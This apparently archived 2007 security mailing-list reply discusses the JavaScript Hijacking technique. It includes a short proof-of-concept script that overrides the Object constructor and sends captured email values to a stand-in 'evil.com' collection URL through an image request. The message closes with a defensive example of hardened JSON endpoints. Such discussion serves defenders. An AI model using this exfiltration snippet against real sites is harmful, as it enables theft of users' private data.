Hi Brian,
On Mon, 02/04/2007 at 12:13 -0700, Brian Chess wrote:
> Hi Stefano,
> 
> Yes, we are aware of your paper, but we intentionally chose to omit the
> reference because we are quite snobby.  I'm joking!

:DD lol

> The difference between what you discuss and JavaScript Hijacking is that we
> do not assume the presence of another defect.  JavaScript Hijacking does not
> require the existence of a cross-site scripting vulnerability or the like.
> It's a new attack technique (and a new vulnerable code pattern), not a new
> method for exploiting an existing class of vulnerabilities.

Ok I see the difference. 
You are taking advantage of a pure JSON CSRF with an evil script which
contains a modified version of the Object prototype.
And when the callback function is executed you use an XMLHttpRequest in
order to send the information extracted by the instantiated object.

Well, I can see that you don't require an XSS vuln on a host, but you
assume a vulnerability on a user who has to click on a link :)

Anyway, if there's an HTML injection on a 3rd site you could use an
iframe with an evil page like the one you described without waiting for
a user to click on an untrusted link.

Or, if you can't use iframes, as XMLHttpRequest is restricted by the same
origin policy, you don't need an evil page since you could use an XSS
vulnerable site as a vector in order to steal JSON information with an
img tag.
--
<script>
// Redefine the global Object constructor so that every object the JSON
// response instantiates gets an 'email' setter (old Mozilla setter syntax).
function Object(){
  this.email setter = captureObject;
}
// The setter receives the value assigned to 'email' and leaks it through
// an image request (URLs left defanged as in the original message).
function captureObject(x){
  (new Image()).src='http:// evil. com/ collect?email='+x;
}
</script>
<script src='http:// vuln /json.js' ></script>
<script src='http:// vuln /json.js' ></script>
--

But this is just another way to accomplish your attack.

BTW very nice paper!

Regards,
Stefano

> Thanks,
> Brian

-- 
...oOOo...oOOo....
Stefano Di Paola
Software & Security Engineer

Web: www.wisec.it
..................

Attachment: signature.asc
Description: This is a digitally signed part of the message
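As an added illustration (not code from this thread or from Brian's paper), the following Node.js snippet shows the precondition the attack above relies on, a JSON endpoint whose plain GET response is also valid JavaScript when pulled in through a script tag, next to a hardened handler that requires a request header a script tag cannot send and prefixes the body so it no longer parses as a script. All function names, the header name and the sample data are assumptions.

```javascript
// Hypothetical request handlers; the request shape {method, headers} is assumed.
const JSON_PREFIX = ")]}',\n"; // turns the body into a syntax error as a script

// Constructed sample of the kind of data a hijacked /json.js might return.
const SAMPLE = [{ email: "alice@example.invalid" }];

// Vulnerable pattern: any GET carrying the victim's cookie receives raw JSON,
// which is a valid JavaScript expression statement when loaded via <script src>.
function serveJson(req) {
  return { status: 200, body: JSON.stringify(SAMPLE) };
}

// Hardened pattern: a <script> tag cannot set custom headers, so demand one;
// additionally prefix the body so that even a successful include cannot run.
function serveJsonHardened(req) {
  if (req.headers["x-requested-with"] !== "XMLHttpRequest") {
    return { status: 403, body: "" };
  }
  return { status: 200, body: JSON_PREFIX + JSON.stringify(SAMPLE) };
}

// Same-origin XMLHttpRequest client: strip the prefix, then parse normally.
function parseProtected(body) {
  if (!body.startsWith(JSON_PREFIX)) throw new Error("missing anti-hijack prefix");
  return JSON.parse(body.slice(JSON_PREFIX.length));
}

// Check whether a response body would be accepted as a script at all.
// new Function() only compiles the text, it does not execute it.
function loadsAsScript(body) {
  try { new Function(body); return true; } catch (e) { return false; }
}
```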

_______________________________________________
Secure Coding mailing list (SC-L) SC-L@securecoding.org
List information, subscriptions, etc - http://krvw.com/mailman/listinfo/sc-l
List charter available at - http://www.securecoding.org/list/charter.php
SC-L is hosted and moderated by KRvW Associates, LLC (http://www.KRvW.com)
as a free, non-commercial service to the software security community.
_______________________________________________
